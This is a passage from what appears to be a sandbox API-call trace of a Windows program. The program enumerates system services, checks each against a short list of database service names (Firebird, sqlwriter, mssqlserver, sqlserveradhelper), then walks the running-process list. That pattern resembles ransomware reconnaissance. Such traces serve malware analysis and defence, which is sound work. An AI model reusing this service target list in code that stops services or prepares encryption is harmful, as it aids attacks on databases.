cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0215.495] GetLastError () returned 0xea [0215.495] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x40fae90 [0215.496] EnumServicesStatusExW (in: hSCManager=0x236b968, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x40fae90, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x40fae90, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0215.496] CloseServiceHandle (hSCObject=0x236b968) returned 1 [0215.497] lstrlenW (lpString="Appinfo") returned 7 [0215.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0215.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0215.497] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0215.497] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0215.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0215.497] lstrlenW (lpString="AppXSvc") returned 7 [0215.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0215.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0215.497] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0215.497] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0215.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0215.497] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0215.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0215.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0215.497] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0215.497] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0215.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0215.497] lstrlenW (lpString="Audiosrv") returned 8 [0215.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0215.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0215.497] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0215.497] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0215.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0215.497] lstrlenW (lpString="BFE") returned 3 [0215.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0215.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0215.498] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0215.498] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0215.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0215.498] lstrlenW (lpString="BITS") returned 4 [0215.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0215.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0215.498] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0215.498] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0215.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0215.498] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0215.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0215.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0215.498] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0215.498] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0215.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0215.498] lstrlenW (lpString="CDPSvc") returned 6 [0215.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0215.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0215.498] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0215.498] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0215.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0215.498] lstrlenW (lpString="ClickToRunSvc") returned 13 [0215.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0215.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0215.499] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0215.499] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0215.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0215.499] lstrlenW (lpString="ClipSVC") returned 7 [0215.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0215.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0215.499] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0215.499] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0215.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0215.499] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0215.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0215.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0215.499] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0215.499] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0215.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0215.499] lstrlenW (lpString="CryptSvc") returned 8 [0215.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0215.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0215.499] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0215.499] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0215.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0215.499] lstrlenW (lpString="DcomLaunch") returned 10 [0215.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0215.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0215.499] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0215.499] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0215.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0215.499] lstrlenW (lpString="DeviceAssociationService") returned 24 [0215.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0215.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0215.499] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0215.499] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0215.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0215.499] lstrlenW (lpString="Dhcp") returned 4 [0215.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0215.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0215.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0215.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0215.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0215.500] lstrlenW (lpString="Dnscache") returned 8 [0215.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0215.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0215.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0215.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0215.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0215.500] lstrlenW (lpString="DoSvc") returned 5 [0215.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0215.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0215.500] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0215.500] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0215.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0215.500] lstrlenW (lpString="DPS") returned 3 [0215.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0215.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0215.500] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0215.500] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0215.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0215.500] lstrlenW (lpString="DusmSvc") returned 7 [0215.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0215.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0215.500] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0215.500] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0215.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0215.500] lstrlenW (lpString="EventLog") returned 8 [0215.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0215.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0215.500] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0215.500] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0215.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0215.500] lstrlenW (lpString="EventSystem") returned 11 [0215.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0215.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0215.501] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0215.501] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0215.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0215.501] lstrlenW (lpString="FontCache") returned 9 [0215.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0215.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0215.501] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0215.501] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0215.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0215.501] lstrlenW (lpString="gpsvc") returned 5 [0215.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0215.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0215.501] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0215.501] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0215.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0215.501] lstrlenW (lpString="iphlpsvc") returned 8 [0215.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0215.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0215.501] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0215.501] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0215.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0215.501] lstrlenW (lpString="KeyIso") returned 6 [0215.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0215.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0215.501] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0215.501] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0215.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0215.501] lstrlenW (lpString="LanmanServer") returned 12 [0215.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0215.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0215.501] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0215.501] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0215.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0215.501] lstrlenW (lpString="LanmanWorkstation") returned 17 [0215.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0215.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0215.502] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0215.502] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0215.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0215.502] lstrlenW (lpString="lfsvc") returned 5 [0215.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0215.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0215.502] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0215.502] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0215.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0215.502] lstrlenW (lpString="LicenseManager") returned 14 [0215.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0215.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0215.502] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0215.502] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0215.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0215.502] lstrlenW (lpString="lmhosts") returned 7 [0215.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0215.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0215.502] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0215.502] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0215.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0215.502] lstrlenW (lpString="LSM") returned 3 [0215.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0215.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0215.502] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0215.502] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0215.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0215.502] lstrlenW (lpString="MpsSvc") returned 6 [0215.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0215.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0215.502] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0215.502] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0215.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0215.502] lstrlenW (lpString="NcbService") returned 10 [0215.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0215.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0215.503] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0215.503] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0215.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0215.503] lstrlenW (lpString="netprofm") returned 8 [0215.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0215.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0215.503] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0215.503] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0215.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0215.503] lstrlenW (lpString="NlaSvc") returned 6 [0215.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0215.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0215.503] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0215.503] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0215.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0215.503] lstrlenW (lpString="nsi") returned 3 [0215.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0215.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0215.503] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0215.503] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0215.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0215.503] lstrlenW (lpString="PcaSvc") returned 6 [0215.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0215.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0215.503] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0215.503] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0215.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0215.503] lstrlenW (lpString="PlugPlay") returned 8 [0215.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0215.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0215.503] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0215.503] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0215.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0215.503] lstrlenW (lpString="Power") returned 5 [0215.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0215.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0215.504] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0215.504] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0215.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0215.504] lstrlenW (lpString="ProfSvc") returned 7 [0215.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0215.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0215.504] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0215.504] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0215.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0215.504] lstrlenW (lpString="RpcEptMapper") returned 12 [0215.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0215.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0215.504] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0215.504] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0215.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0215.504] lstrlenW (lpString="RpcSs") returned 5 [0215.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0215.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0215.504] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0215.504] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0215.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0215.504] lstrlenW (lpString="SamSs") returned 5 [0215.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0215.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0215.504] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0215.504] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0215.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0215.504] lstrlenW (lpString="Schedule") returned 8 [0215.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0215.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0215.504] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0215.504] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0215.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0215.506] lstrlenW (lpString="SecurityHealthService") returned 21 [0215.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0215.506] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0215.506] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0215.506] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0215.506] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0215.506] lstrlenW (lpString="SENS") returned 4 [0215.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0215.506] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0215.506] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0215.506] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0215.506] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0215.506] lstrlenW (lpString="ShellHWDetection") returned 16 [0215.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0215.506] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0215.506] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0215.506] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0215.506] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0215.506] lstrlenW (lpString="Spooler") returned 7 [0215.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0215.506] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0215.506] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0215.506] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0215.507] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0215.507] lstrlenW (lpString="sppsvc") returned 6 [0215.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0215.507] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0215.507] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0215.507] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0215.507] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0215.507] lstrlenW (lpString="SSDPSRV") returned 7 [0215.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0215.507] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0215.507] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0215.507] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0215.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x424 [0215.511] Process32FirstW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.512] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.513] lstrlenW (lpString="System") returned 6 [0215.513] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.514] lstrlenW (lpString="smss.exe") returned 8 [0215.514] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.514] lstrlenW (lpString="csrss.exe") returned 9 [0215.514] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.515] lstrlenW (lpString="wininit.exe") returned 11 [0215.515] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 